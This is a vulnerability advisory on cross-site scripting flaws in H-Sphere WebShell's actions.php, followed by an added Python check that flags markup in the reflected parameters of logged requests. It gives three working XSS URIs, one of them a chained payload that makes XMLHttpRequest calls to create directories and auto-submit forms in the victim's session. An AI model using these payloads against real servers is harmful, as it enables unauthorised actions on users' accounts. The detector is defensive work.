H-Sphere WebShell 'actions.php' Multiple Cross Site Scripting Vulnerabilities
To exploit these issues an attacker entices an unsuspecting user into following a malicious URI. The following example URIs are available:

http://www.example.com/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E

http://www.example.com/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]

http://www.example.com/actions.php?m=sysinfo&tab=1'><img/src/onerror=with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};}
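An added example, not part of the original advisory: a Python check for log review or request filtering that flags requests to actions.php whose fn, mask or tab value decodes to HTML metacharacters, the pattern the example URIs share. The mode-to-parameter map is read off the URIs above; the function names and the sample requests are constructed for illustration.

```python
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Mode -> reflected parameter, as seen in the advisory's example URIs.
REFLECTED = {"dload": "fn", "search": "mask", "sysinfo": "tab"}
# Characters that let a value leave HTML text or attribute context.
# Note: a legitimate file name containing a quote would also be flagged.
MARKUP = set("<>\"'")


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C) so it cannot hide markup."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_request(url, body=""):
    """Return [(param, decoded_value)] for reflected parameters carrying markup.

    `body` is the urlencoded POST data, needed for the m=search case where
    the mask parameter never appears in the access log's request line.
    """
    parts = urlsplit(url)
    if not parts.path.endswith("/actions.php"):
        return []
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    form = dict(parse_qsl(body, keep_blank_values=True))
    param = REFLECTED.get(query.get("m"))
    if param is None:
        return []
    hits = []
    for source in (query, form):
        if param in source:
            value = fully_decode(source[param])
            if MARKUP & set(value):
                hits.append((param, value))
    return hits


if __name__ == "__main__":
    # Constructed sample requests (harmless markup, not the advisory payloads).
    base = "http://www.example.com/actions.php"
    print(flag_request(base + "?m=dload&fn=report.txt"))
    print(flag_request(base + "?m=dload&fn=%3Cb%3Ex%3C%2Fb%3E"))
    print(flag_request(base + "?m=search&start=1", "fld=%2F&mask=%253Cb%253E"))
    print(flag_request(base + "?m=sysinfo&tab=1%27%3E"))
```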